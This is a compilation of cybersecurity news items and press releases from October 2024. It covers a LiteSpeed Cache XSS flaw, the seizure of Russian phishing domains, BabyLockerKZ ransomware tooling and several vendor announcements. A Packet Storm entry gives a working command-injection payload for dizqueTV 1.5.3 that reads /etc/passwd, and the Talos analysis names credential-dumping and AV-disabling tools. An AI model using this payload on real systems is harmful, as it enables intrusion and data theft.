Torrance, United States / California, 7th October 2024, CyberNewsWire

**Torrance, United States / California, October 7th, 2024, CyberNewsWire**

Criminal IP, a renowned Cyber Threat Intelligence (CTI) search engine developed by AI SPERA, has partnered with Hybrid Analysis, a platform that provides advanced malware analysis and threat intelligence, to enhance threat research.

This collaboration integrates Criminal IP’s advanced domain scanning capabilities into the Hybrid Analysis platform, providing security professionals with deeper insights and more effective threat mitigation strategies.

**Comprehensive Malware and Domain Analysis**

Hybrid Analysis employs dynamic and static techniques for thorough malware analysis. Real-time execution environments and memory dumps generate annotated disassembly listings and critical Indicators of Compromise (IOCs).

Criminal IP specializes in real-time domain scanning, scrutinizing domains for phishing, malware, and illicit activities. Integration enriches threat profiles, improving threat detection accuracy.

**Key Benefits of the Collaboration:**

*   **Enhanced Threat Profiling**: Security professionals can gain deeper insights into the origins and behaviors of threats identified through Hybrid Analysis, enriched with Criminal IP’s data.
*   **Real-Time Domain Analysis**: Integration with Criminal IP enables users to conduct real-time scans on domains of interest, which is crucial for accurately identifying emerging threats promptly.
*   **Comprehensive Security Insights**: Users gain access to detailed domain attributes such as phishing records, abuse incidents, and detection of embedded malicious code, enhancing their ability to analyze for signs of Domain Generation Algorithms (DGA) and phishing probabilities.
*   **Interactive Score Card**: Users can quickly assess domain status, accessing additional details directly from Criminal IP database to make informed decisions based on the latest threat intelligence.

**Criminal IP’s Advanced Real-Time Threat Detection**

In addition to this comprehensive maliciousness result, uses seeking information about each component and false positives can visit Criminal IP.

<Example of Criminal IP Domain Search for malicious URL>

The URL scan feature allows users to extract a wealth of data, including network logs, associated IP addresses, malicious links, and website vulnerabilities.

Users of Criminal IP Domain Search can access valuable insights such as technology usage specifics, abuse records, and identified CVE vulnerabilities, all conveniently consolidated on a single page.

This robust search engine offers three customizable subscription plans—Lite, Medium, and Pro—including a Free membership option.

To determine the most suitable plan based on user’s volume of IP Lookup and URL Scan/Lookup requirements, users can explore the Free membership, monitor their credit usage through a user-friendly dashboard, and take advantage of key features for gaining valuable insights.

**About AI SPERA**

AI SPERA, a leader in Cyber Threat Intelligence (CTI) solutions, significantly expanded its reach by launching its flagship solution, Criminal IP, in 2023.

Since then, the company has formed technical and business collaborations with over 40 renowned global security firms, including Hybrid Analysis, VirusTotal, Cisco, Tenable, Sumo Logic, and Quad9.

Besides the CTI search engine, the company offers Criminal IP ASM, a SaaS-based Attack Surface Management Solution on AWS Marketplace and Azure Marketplace, and Criminal IP FDS, an AI-based Anomaly Detection Solution for credential stuffing prevention and fraud detection.

Available in five languages (English, French, Arabic, Korean, and Japanese), the search engine provides a powerful service for users worldwide.

**Contact**

**Michael Sena**  
**AI SPERA**  
**\[email protected\]**

Hybrid Analysis Utilizes Criminal IP’s Robust Domain Data for Better Malware Detection

The popular LiteSpeed Cache plug-in is vulnerable to unauthenticated privilege escalation via a dangerous XSS flaw.

Source: Primakov via Shutterstock

A WordPress plug-in installed more than 6 million times is vulnerable to a cross-site scripting flaw (XSS) that allows attackers to escalate privileges and potentially install malicious code to enable redirects, ads, and other HTML payloads onto an affected website.

A security researcher who goes by the online name "TaiYou" discovered the flaw, tracked as CVE-2024-47374, in LiteSpeed Cache, known as the most popular caching plug-in for the WordPress content management system (CMS). TaiYou reported the flaw on Sept. 24 to Patchstack via the Patchstack Bug Bounty Program for WordPress; it affects LiteSpeed Cache through version 6.5.0.2, and users should update immediately to avoid being vulnerable to attack.

LiteSpeed Cache is described by its developers as an "all-in-one site acceleration plugin, featuring an exclusive server-level cache and a collection of optimization features." It supports WordPress Multisite and is compatible with the most popular plug-ins, including WooCommerce, bbPress, and Yoast SEO.

The flaw that requires immediate attention is an unauthenticated stored XSS vulnerability that "could allow any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by performing a single HTTP request," according to Patchstack.

XSS is one of the most oft-exploited and oldest Web vulnerabilities, allowing an attacker to inject malicious code into a legitimate webpage or application to execute malicious scripts that affect the person visiting the site.

**Three WordPress Plug-in Flaws, One Dangerous**

TaiYou actually found three flaws in the plug-in, including another XSS flaw as well as a path-traversal vulnerability. However, only CVE-2024-47374 is considered dangerous and expected to be exploited by attackers, according to Patchstack.

Upon notification by Patchstack, the developers of LiteSpeed cache plug-in sent back a patch for validation on the same day. Patchstack published an update that fixes all three flaws in LiteSpeed cache version 6.5.1 on Sept. 25, and added the flaws to its vulnerability database five days later.

CVE-2024-47374 is characterized as creating "Improper Neutralization of Input During Web Page Generation," according to its listing on CVEdetails.com. "The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users," according to the listing.

The vulnerability occurs because the code that handles the view of a queue in a particular piece of the plug-in doesn’t implement sanitization and output escaping, according to Patchstack.

"The plugin outputs a list of URLs that are queued for unique CSS generation and with the URL another functionality called 'Vary Group' is printed on the Admin page," according to the blog post.

In this output, the "Vary Group" functionality combines the concepts of "cache varies" and "user roles." "The vulnerability occurs because Vary Group can be supplied by a user via an HTTP Header and printed on the admin page without sanitization," according to Patchstack.

**Update & Mitigate CVE-2024-47374**

Due to its widespread use as a foundation for websites, the WordPress platform and its plug-ins especially are a notoriously popular target for threat actors, giving them easy access to a broad attack surface. Attackers particularly like to target singular plug-ins with large install bases, which makes vulnerable versions of LiteSpeed Cache a likely target.

The patch for CVE-2024-47374 is "fairly simple," sanitizing the output using esc\_html, according to Patchstack. The company issued a virtual patch to mitigate the flaw by blocking any attacks until its customers have updated to a fixed version. Meanwhile, all administrators of WordPress sites that use LiteSpeed Cache are advised to update to fixed version 6.5.1 immediately.

Patchstack also recommends that WordPress website developers working with the plug-in apply escaping and sanitization to any message that will be displayed as an admin notice to mitigate the vulnerability.

"Depending on the context of the data, we recommend using sanitize\_text\_field to sanitize value for HTML output (outside of HTML attribute) or esc\_html," according to the post. "For escaping values inside of attributes, you can use the esc\_attr function."

Patchstack also recommends that site developers working with LiteSpeed Cache also apply a proper permission or authorization check to the registered rest route endpoints to avoid exposing a site to XSS vulnerability.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Single HTTP Request Can Exploit 6M WordPress Sites

DoJ and Microsoft seized over 100 sites used by Russian hackers for phishing campaigns targeting the U.S. The…

DoJ and Microsoft seized over 100 sites used by Russian hackers for phishing campaigns targeting the U.S. The coordinated effort aims to disrupt state-backed cyber attacks and protect sensitive American data.

The U.S. Department of Justice (DoJ) has revealed that it successfully took down 41 malicious websites allegedly operated by Russian intelligence agents and their collaborators. The seized domains were reportedly being used to conduct malicious cyber activities, including targeting American institutions, in what authorities have called a “sophisticated and ongoing” campaign to exploit sensitive data.

According to the DoJ, the seized domains were being used by a group known as the “**Callisto Group**,” an operational unit within the Russian Federal Security Service (FSB). The group is accused of orchestrating spear-phishing campaigns—targeted email attacks designed to deceive recipients into revealing login credentials. The aim was to gain unauthorized access to confidential information from government entities and other high-value targets.

This action is part of a bigger effort to fight cybercrime in the U.S. and lines up with Microsoft’s latest **announcement** about taking control of 66 similar domains managed by the same group.

Deputy Attorney General Lisa Monaco highlighted the importance of the collaborative effort, **saying**, “Today’s seizure of 41 internet domains reflects the Justice Department’s cyber strategy in action—using every tool at our disposal to disrupt and deter state-sponsored cyber actors.”

She emphasised and claimed that the Russian government used these domains to impersonate legitimate entities and lure victims into a trap. With the help of private partners like Microsoft, Monaco stated that the Department of Justice is committed to exposing such actors and stripping them of their illicit capabilities.

****Microsoft’s Role in the Joint Effort****

Microsoft played a key role in this operation, filing a civil suit to seize 66 domains also linked to the Callisto Group, which Microsoft internally refers to as “Star Blizzard.” The company’s Threat Intelligence unit reported that, between January 2023 and August 2024, Star Blizzard was involved in targeting over 30 civil society organizations, including journalists, think tanks, and NGOs, in an attempt to exfiltrate sensitive information.

> _“Together, we have seized more than 100 websites. Rebuilding infrastructure takes time, absorbs resources, and costs money. By collaborating with the DOJ, we have been able to expand the scope of disruption and seize more infrastructure, enabling us to deliver greater impact against Star Blizzard “While we expect Star Blizzard to always be establishing new infrastructure, today’s action impacts their operations at a critical point in time when foreign interference in U.S. democratic processes is of utmost concern.”_
> 
> Microsoft

The **affidavit** (PDF) supporting the domain seizures reveals a sophisticated operation targeting numerous individuals and organizations, ranging from former U.S. government employees to defence contractors and Department of Energy staff. These actions, authorities say, were part of an effort to infiltrate key sectors and gather valuable intelligence.

****Callisto Group****

The Callisto Group, tracked by Microsoft under the alias “Star Blizzard” (previously known as SEABORGIUM or COLDRIVER), has become notorious for its consistent use of **spear-phishing tactics**.

These attacks often disguise themselves as legitimate communications, tricking victims into providing login information. The group reportedly targeted individuals linked to the U.S. Intelligence Community, as well as contractors working with sensitive U.S. agencies.

Back in December 2023, two individuals associated with the Callisto Group were **charged** by the DoJ: Ruslan Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets, both linked to FSB Center 18. The indictment accused them of participating in a coordinated hacking campaign against U.S., U.K., NATO member nations, and Ukrainian entities, on behalf of the Russian government.

A phishing email from Callisto Group (Via Microsoft)

It is also worth mentioning that in August last year, INTERPOL dismantled the infamous ’**16shop**’ which served as a Phishing-as-a-Service (PaaS) platform. This was followed by the seizure of another Phishing-as-a-Service platform **BulletProftLink** in November 2023.

Commenting on this, **Casey Ellis**, Founder and Chief Strategy Officer at Bugcrowd, a San Francisco, Calif.-based leader in crowdsourced cybersecurity said, _“_The takedown serves a few purposes: Disrupting existing operations, their infrastructure, and their operatives. It puts ColdRiver, and others, “on notice” that their activities are being detected and that they aren’t operating with impunity, which has the benefit of sowing internal doubt and confusion within the operation, which will chill their activities for a while._“_

_“_Importantly, the announcement and the amount of signalling the USG is doing around this takedown is intended to send a message, both to foreign adversaries as well as those being protected here – Russia is a real adversary, with real cyber-operations underway_,”_ Casey warned.

This latest seizure goes on to show how authorities are not only responding to cyberattacks but also proactively dismantling the infrastructure behind these attacks. Additionally, the ongoing collaboration between the Justice Department, FBI, Microsoft, and other agencies also shows how the government and private sector together can curb cybercrime faster.

1.  **Finnish Dark Web Marketplace PIILOPUOTI Seized**
2.  **Ragnar Locker Ransomware Dismantled, Key Suspect Arrested**
3.  **Indian call center seized over Amazon scam against US citizens**
4.  **Ukrainian Hackers Breach Email of APT28 Leader, Wanted by FBI**
5.  **SSNDOB Cybercrime Market Seized in Intl. Coordinated Operation**

DoJ, Microsoft Seize 100 Russian Phishing Sites Targeting US

Despite what lessons we thought we learned from Colonial Pipeline, none of those lessons have been able to be put into practice.

Thursday, October 3, 2024 14:00

Government-run water systems and other critical infrastructure are still at risk from state-sponsored actors, according to a renewed warning from the U.S. Cybersecurity and Infrastructure Security Agency.  

CISA released an advisory last week on the matter of days after a small water treatment facility in Kansas was forced into manual operations after a cyber attack.  

I feel like this is just the latest in a string of warnings that we’ve been talking about since the Colonial Pipeline attack in 2021 that forced a gasoline shortage across the Eastern U.S. We’ve been discussing the importance of defending critical infrastructure for years now, so what’s new now? 

For starters, it seems like the frequency of these attacks seems to be on the rise. And many efforts to regulate cybersecurity policies and procedures in the industry have thus far fallen flat. 

The White House is reportedly working on rolling out a second wave of cybersecurity recommendations for water treatment facilities on the back of the attack in Kansas that affected the public water supply of 11,000 people. Although the cyber attack did not actually affect anyone from getting their water, it does raise the question of how much of an issue this could be if a state-sponsored actor were to target a facility in a town with a larger population, or if there weren’t backup plans in place to operate the facility manually.  

The U.S. Environmental Protection Agency (EPA) said last year that it had to pull a memo outlining cybersecurity standards at water treatment plants because of constant legal action from state and federal lawmakers and private water companies. And the American Water Works Association (a non-profit lobbying organization representing more than 50,000 members) has advocated for facilities and groups like the AWWA to write their own cybersecurity policies rather than relying on the U.S. government.  

All of that is to say, despite what lessons we thought we learned from Colonial Pipeline, none of those lessons have been able to be put into practice, and we’re still where we were with cybersecurity policies and regulations three years ago.  

Despite urging from the industry and some lawmakers, I’ve yet to see these groups write any of their own policies, so even if they have that power, they don’t seem to be taking advantage of it. So when CISA puts out this type of alert again in a few months after whatever future incident lies ahead, I would expect to see more action from all parties involved rather than another round of words warning that attacks can, and will, happen. 

**The one big thing **

Talos has recently observed an attack leading to the deployment of a MedusaLocker ransomware variant known as “BabyLockerKZ.” This actor has been active since at least late 2022 and targets organizations worldwide, although the number of victims was higher than average in EU countries until mid-2023 and, since then, in South American countries. We assess with medium confidence that the actor is financially motivated, likely working as an IAB or an affiliate of a ransomware cartel. 

**Why do I care? **

The actor behind these attacks seems to be particularly active, infecting more than 100 organizations per month, according to Talos telemetry. This reveals the professional and highly aggressive nature of the attacks and is coherent with the activity we would expect from an IAB or ransomware affiliate. As with any ransomware, BabyLockerKZ looks to encrypt targets’ files and lock them down until the target pays the request ransom.  

**So now what? **

Talos has released several new Snort rules and ClamAV signatures that detect the activity of this group and BabyLockerKZ. This group is also known to use several publicly available tools in their attacks, such as Mimikatz, which are well-known to the security community at this point. For more on living-off-the-land binaries (LoLBins) that attackers like this one are increasingly using, read our blog post here.  

**Top security headlines of the week **

**International law enforcement agencies worked together to arrest and unmask four individuals believed to be associated with the LockBit ransomware group.** As part of this campaign, investigators have also linked one of the LockBit members to Evil Corp, a Russian-backed cybercrime gang. At a press conference announcing the arrests, representatives from the U.K.’s National Crime Agency said that Evil Corp maintained a “privileged” relationship with the Russian government and was often asked to carry out targeted cyber attacks against NATO countries. LockBit is traditionally associated with financially motivated ransomware attacks targeting private companies, regardless of the country in which they reside. Europol, the U.K. NCA, the U.S. FBI and Japan’s National Police have also worked together to create and release a decryptor that can unlock files affected by the LockBit ransomware. The same agencies have been working since last year to target and seize assets and servers belonging to LockBit. The threat actor has taken credit for several major attacks over the past several years, including those targeting Boeing, Volkswagen, multiple major international ports and government-owned computers in Fulton County, Georgia. (Europol, TechCrunch) 

**The latest version of the U.S.’s National Institute of Standards and Technology’s password recommendations drop complexity in favor of length.** NIST’s latest version of its Password Guidelines removes the recommendations that passwords use a mixture of character types and that they be changed often. Instead, the draft states that credential service providers (CSPs) recommend users create passwords between 15 and 64 characters that may include ASCII or Unicode characters. The previous version of the NIST standards led many users to adopt easy-to-guess passwords such as “Password1234!” or store the complicated passwords in easy-to-access places, such as written down on a piece of paper near their computer. CSPs are also instructed to drop knowledge-based authentication or security questions when selecting passwords. NIST standards are important because they formalize principles widely adopted by the U.S. government and major technology companies like Microsoft and Google. The latest draft also states that users only need to change their passwords in the event of a publicly reported data breach. (Infosecurity Magazine, Dark Reading) 

**A vulnerability in a web app from car manufacturer Kia could allow an attacker to view a car’s license plate, unlock the doors, and even remotely start the ignition.** The since-patched vulnerability in Kia’s web portal could allow attackers to essentially build and deploy their own web app and reassign control of the internet-connected features of most modern Kia vehicles. The vulnerability could have allowed an adversary to immediately ping the location of a targeted vehicle, process its license plate number, and even honk the horn. This is the second such vulnerability the group of researchers has disclosed to a Hyundai-owned company in the past two years. The vulnerability highlights the risk that modern vehicles come with, many of which rely on internet connectivity for some of their features or interface with web apps, websites or mobile phone apps. A proof of concept from the researchers included a dashboard that could allow an attacker to type in a license plate number and then retrieve the owner’s personal information, eventually adding themselves as an “owner” of the car and executing commands on the vehicle. (Wired, Security Week) 

**Can’t get enough Talos? **

*   Resurgence of Spam: Cisco Talos Sound Alarm on New Tactics 
*   Critical RCE vulnerability found in OpenPLC 
*   Simple Mail Transfer Pirates: How threat actors are abusing third-party infrastructure to send spam 

**Upcoming events where you can find Talos**

**MITRE ATT&CKcon 5.0** **(Oct. 22 - 23)** 

_McLean, Virginia and Virtual_

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

**it-sa Expo & Congress** **(Oct. 22 - 24)** 

_Nuremberg, Germany_

**White Hat Desert Con** **(Nov. 14)** 

_Doha, Qatar_

**misecCON** **(Nov. 22)** 

_Lansing, Michigan_

Terryn Valikodath from Cisco Talos Incident Response will explore the core of DFIR, where digital forensics becomes detective work and incident response turns into firefighting.

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
**MD5:** 71fea034b422e4a17ebb06022532fdde   
**Typical Filename:** VID001.exe   
**Claimed Product:** N/A   
**Detection Name:** RF.Talos.80 

**SHA 256:** 76491df69a26019139ac11117cd21bf5d0257a5ebd3d67837f558c8c9c3483d8   
**MD5:** b209df2951e29ab5eab4009579b10b8d  
**Typical Filename:** FileZilla\_3.67.1\_win64\_sponsored2-setup.exe   
**Claimed Product:** FileZilla   
**Detection Name:** W32.76491DF69A-95.SBX.TG

**SHA 256:** c20fbc33680d745ec5ff7022c282a6fe969c6e6c7d77b7cfac34e6c19367cf9a   
**MD5:** 3bc6d86fc4b3262137d8d33713ed6082   
**Typical Filename:** 8c556f0a.dll   
**Claimed Product:** N/A   
**Detection Name:** Gen:Variant.Lazy.605353 

**SHA 256:** f0d7a2bb0c5db162332418747ba4987027b8a746b24c919a24235ff3b70d25e3   
**MD5:** 0d849044612667362bc88780baa1c1b7   
**Typical Filename:** CryptX.dll   
**Claimed Product:** N/A    
**Detection Name:** Gen:Variant.Lazy.605353 

**SHA 256:** 331fdf5f1f5679a6f6bb0baee8518058aba8081ef8f96e57fa3b74291fcbb814   
**MD5:** f23b90fc9bc301baf3e399e189b6d2dc   
**Typical Filename:** B.dll   
**Claimed Product:** N/A     
**Detection Name:** Gen:Variant.Lazy.605353

CISA is warning us (again) about the threat to critical infrastructure networks

San Francisco, United States / California, 3rd October 2024, CyberNewsWire

**San Francisco, United States / California, October 3rd, 2024, CyberNewsWire**

Doppler, the leading platform in secrets management, today announces the launch of **Change Requests**, a new feature providing engineering teams with a secure, auditable approval process for managing and controlling secret changes across environments. Designed to enhance security, compliance, and team collaboration, **Change Requests** gives organizations the tools to mitigate the potential risks from misconfigurations or unauthorized changes and maintain a comprehensive audit trail of all secret modifications. This launch comes at a time when organizations are facing increased security and compliance demands, particularly in managing sensitive information.

As security breaches and insider threats continue to rise, managing secrets has become a growing challenge for teams of all sizes; protecting sensitive information at every stage of the software development lifecycle is critical. According to a recent study by Cybersecurity Ventures, cybercrime damages are expected to cost the world $9.5 trillion in 2024 alone, and compromised secrets and misconfigurations remain significant factors in these attacks. In 2023, GitGuardian reported that there were 12.8 million incidents of exposed secrets on Github which is an increase of 28% from 2022, highlighting the need for tighter controls over sensitive information.

Doppler’s **Change Requests** is designed to address these risks by introducing a formalized, auditable approval process for secrets management. This feature offers teams a centralized and controlled way to manage changes to sensitive information while maintaining full visibility into who made updates and when.

**Addressing Needs for Security and Compliance**

*   **Reducing Misconfiguration:** According to the most recent Verizon Data Breach Investigation Report, breaches as a result of errors grew by 28%. By treating secret changes like code, Doppler seeks to help companies decrease this number and reduce the chances of misconfigurations reaching production. With Change Requests, organizations can require peer reviews and approvals for every configuration change to ensure all updates undergo proper scrutiny before being deployed.
*   **The Growing Compliance Burden:** Cybersecurity standards are increasingly holding companies accountable for how they handle sensitive data. Organizations need clear audit trails and compliance-friendly processes. Paired with detailed activity logging, Change Requests further eases the burden teams face by keeping a complete, auditable trail of every request, review, and change, providing a fully traceable history.
*   **Enforce Security with Controlled Access:** As teams grow, so does the complexity of managing secrets. Organizations can safeguard sensitive secrets with custom roles and user groups by enforcing a structured approval process, ensuring only authorized personnel can make critical updates. This helps prevent unauthorized changes and boosts their overall security posture while keeping teams nimble.

**Building Trust Through Security**

> “It’s incredibly exciting to ship our most demanded feature by both developers and enterprises! Just as pull requests have increased the level of trust with production code, Doppler will fill that long awaited gap with secrets,” said **Brian Vallelunga**, CEO of Doppler. “I’m confident that Doppler’s Change Requests is going to establish a new paradigm for managing secrets securely at enterprise scale—undergoing approval, maintaining a rich audit trail for security and compliance, and integrating natively with production infrastructure for uninterrupted, no-downtime rollouts.”

**Availability**

The Change Requests feature is available now for all users on Doppler’s Enterprise plan. To learn more about implementing Change Requests and how it can improve the organization’s security and compliance efforts, users can visit Doppler’s documentation.

**About Doppler**

Doppler is the leading platform for managing secrets such as environment variables, API keys, and tokens in a centralized, secure, and scalable way. Trusted by thousands of security-conscious teams around the world, Doppler provides developers with the tools they need to keep secrets in sync across every app, service, and infrastructure. Built with security in mind, Doppler offers robust integrations, comprehensive logging, and enterprise-grade encryption to ensure sensitive data remains protected throughout its lifecycle.

**Contact**

**Doppler Press**  
**\[email protected\]**

Doppler Launches ‘Change Requests’ to Strengthen Secrets Management Security with Audited Approvals

dizqueTV version 1.5.3 suffers from a remote code execution vulnerability.

**dizqueTV 1.5.3 Remote Code Execution**

Posted Oct 3, 2024

Authored by Ahmed Said Saud Al-Busaidi

dizqueTV version 1.5.3 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution

SHA-256 | b18cb14167c97952ef1684789d6a48b83e5c1338a0677edc0b3eaef195497b45

Download | Favorite | View

**dizqueTV 1.5.3 Remote Code Execution**

    # Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE)# Date: 9/21/2024# Exploit Author: Ahmed Said Saud Al-Busaidi# Vendor Homepage: https://github.com/vexorian/dizquetv# Version: 1.5.3# Tested on: linuxPOC:## Vulnerability DescriptiondizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers.## STEPS TO REPRODUCE1. go to http://localhost/#!/settings 2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'"3. click on update4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd

**File Tags**

*   ActiveX (933)
*   Advisory (87,037)
*   Arbitrary (17,123)
*   BBS (2,859)
*   Bypass (1,932)
*   CGI (1,049)
*   Code Execution (7,927)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,438)
*   DoS (25,312)
*   Encryption (2,395)
*   Exploit (54,379)
*   File Inclusion (4,278)
*   File Upload (1,026)
*   Firewall (822)
*   Info Disclosure (2,927)
*   Intrusion Detection (921)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,313)
*   Local (14,866)
*   Magazine (587)
*   Overflow (13,229)
*   Perl (1,435)
*   PHP (5,293)
*   Proof of Concept (2,415)
*   Protocol (3,753)
*   Python (1,664)
*   Remote (31,931)
*   Root (3,674)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,660)
*   Security Tool (8,055)
*   Shell (3,310)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,739)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,135)
*   Web (10,147)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,308)
*   Other

**File Archives**

*   October 2024
*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,132)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,599)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,415)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,936)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,896)
*   UNIX (9,464)
*   UnixWare (188)
*   Windows (6,782)
*   Other

dizqueTV 1.5.3 Remote Code Execution

Malwarebytes Browser Guard now warns users about recent data breaches, as well as automatically opting users out of tracking cookies.

Two things are true of data online: It will be collected and, just as easily, it will be lost. 

But a major update to Malwarebytes Browser Guard will better protect users from opaque data collection that happens every day online, as well as raising their awareness about corporate data breaches that have left their sensitive information vulnerable to harm.    

First, Browser Guard will now send helpful notifications to users when they visit a website belonging to a company that has suffered a proven data breach in the past 90 days. While everyday users might already know about some of the largest breaches in recent history—AT&T comes to mind—it can be nearly impossible to keep track of every single company that has lost user data in the past.  

With these new data breach notifications, Browser Guard will warn users about recent data breaches they perhaps never heard about, from the 2.2 million people affected by the breach of Rite Aid, to the 1.7 million people affected by the breach of Slim CD, to the 500,000 people affected by the breach of the Texas Dow Employees Credit Union.  

Importantly, Browser Guard will not send repeat notifications that pester return users. The notifications will also include direct access to the Malwarebytes Digital Footprint Portal, allowing users to check in real time whether their data was included in any flagged breach.  

In a second, added feature, Browser Guard is also making it easier to stay private online by automatically opting users out of data collection performed by tracking cookies that are littered across the internet, with no extra effort required on users’ behalf.

These types of cookies are present on nearly every single website that people visit today, from Google to Facebook to YouTube to Reddit. They are invisible pieces of code that advertisers use to track user activity even after they leave a website.

This data, when collected in aggregate, can reveal a person’s age, gender, hometown, relationship status, political beliefs, and so much more. And it’s precisely this data that advertisers want, as it helps them micro-target their ads to, say, new dads in Overland Park, Kansas, looking for a lawnmower, or, first-time homeowners in San Francisco needing a washer and dryer that fit in a small space.

For more than a decade, this type of data collection happened invisibly, but when the European Union passed a sweeping set of data protection rights in 2016, much of that changed.

Following the passage of the law (referred to in short as GDPR), users began to see cumbersome popups everywhere across the web that asked about “cookie preferences”—preferences around how these invisible trackers would collect information both for the website itself and for the advertisers using that website to deliver ads.

With the latest Browser Guard update, cookie consent forms will now be auto-rejected, thus requesting the site to honor the most privacy-preserving settings.

What people experience is a simpler and less aggravating internet, where they’re no longer forced to manage yet another aspect of their privacy.

**Download for Free today:**

For a live look at the new Browser Guard, see the video below.

 Browser Guard now flags data breaches and better protects personal data   

The malware, called "BabyLockerKZ," has primarily affected users in Europe and South America.

*   Cisco Talos has discovered a financially motivated threat actor, active since 2022, recently observed delivering a MedusaLocker ransomware variant. 
*   Intelligence collected by Talos on tools regularly employed by the threat actor allows us to see an estimate of the amount and countries of origin of this group’s victims. This actor has been active since at least late 2022 and targets organizations worldwide, although the number of victims was higher than average in EU countries until mid-2023 and, since then, in South American countries.
*   This threat actor was observed distributing a MedusaLocker ransomware variant known as “BabyLockerKZ.” This variant is compiled with a PDB path containing the word “paid\_memes” which is also present in other tools observed during the attacks, presumably by the same author.
*   Talos has new information on the attacker’s tools, including BabyLockerKz and attacker TTPs and IOCs to assist in detecting and preventing further attacks.

Talos has recently observed an attack leading to the deployment of a MedusaLocker ransomware variant known as “BabyLockerKZ.” The distinguishable techniques — including consistently storing the same set of tools in the same location on compromised systems, the use of tools that have the PDB path with the string “paid\_memes,” and the use of a lateral movement tool named “checker” — used in the attack led us to take a deeper look to try to understand more about this threat actor. 

This attacker uses several publicly known attack tools and living-off-the-land binaries (LoLBins), a set of tools built by the same developer (possibly the attacker) to assist in credential theft and lateral movement in compromised organizations. These tools are mostly wrappers around publicly available tools that include additional functionality to streamline the attack process and provide graphical or command-line interfaces. 

The same developer built the MedusaLocker variant used in the initial attack. This variant that uses the same chat and leak site URLs contains several differences to the original MedusaLocker ransomware, such as a different autorun key or an extra public and private key set stored in the registry. Based on the name of the autorun key, the attackers call this variant “BabyLockerKZ.” 

We assess with medium confidence that the actor is financially motivated, likely working as an IAB or an affiliate of a ransomware cartel, and has been carrying out attacks since at least 2022. Our telemetry indicates that the actor opportunistically targeted many victims worldwide. In late 2022 and early 2023, most victims were in European countries, but since the first quarter of 2023, the group’s focus shifted toward South American countries and, as a result, the number of victims per month almost doubled.

**Tracking BabyLockerKZ across the globe**

Intelligence collected by Talos on tools regularly employed by the threat actor allows us to estimate the number of, and the countries of origin of the victims. Although this is unlikely to capture all of the adversary’s activities, it still provides a look at a specific window of activity.

The actor has been active since at least October 2022. At that time, the targets were mostly located in European countries such as France, Germany, Spain or Italy. During the second  quarter of 2023, the attack volume per month almost doubled, and the group shifted its focus toward South American countries such as Brazil, Mexico, Argentina and Colombia, as shown in the chart below. The attacks kept a steady volume of around 200 unique IPs compromised per month until the first quarter of 2024 when the attacks decreased.

The actor has consistently compromised a large number of organizations, often more than 100 per month, since at least 2022. This reveals the professional and highly aggressive nature of the attacks and is coherent with the activity we would expect from an IAB or ransomware affiliate.

During the attack leading to the deployment of the BabyLockerKZt, the adversary used several publicly known attack tools and others that could be unique to this actor. The group frequently used the Music, Pictures or Documents user folders of compromised systems to store attack tools. For example, the following paths were used to store tools during this attack:

*   c:\\users\\<user>\\music\\advanced\_port\_scanner\_2.5.3869.exe
*   c:\\users\\<user>\\music\\hrsword\\hrsword install.bat
*   c:\\users\\<user>\\music\\killav\\build.004\\disabler.exe
*   c:/users/<user>/music/checker/checker(222).exe
*   c:/users/<user>/music/checker/invoke-thehash.ps1
*   c:/users/<user>/music/checker/checker (222).exe
*   c:/users/<user>/music/checker/invoke-smbexec.ps1
*   c:/users/<user>/music/checker/invoke-wmiexec.ps1
*   c:/users/<user>/appdata/roaming/ntsystem/ntlhost.exe.exe
*   c:/users/<user>/appdata/local/temp/advanced port scanner 2/advanced\_port\_scanner.exe
*   c:/users/<user>/appdata/local/temp/is-juad3.tmp/advanced\_port\_scanner\_2.5.3869.tmp

These are similar to a previous attack leading to MedusaLocker ransomware, documented by ASEC in February 2023, which our telemetry suggests was a more active period for this threat actor.

Some of the publicly known tools used by the attacker are:

*   HRSword\_v5.0.1.1.rar: A tool used to disable AV and EDR software.
*   Advanced\_Port\_Scanner\_2.5.3869.exe: A network-scanning tool with several additional features to map internal networks and devices.
*   Netscan.exe: SoftPerfect Network Scanner: A tool similar to Advanced Port Scanner.
*   Processhacker.exe: Process Monitoring and administration software. Allows a TA to enumerate and control processes running on the infected endpoint.
*   PCHunter64.exe: A tool similar to processhacker.
*   Mimikatz: A tool to dump Windows user credentials from memory.

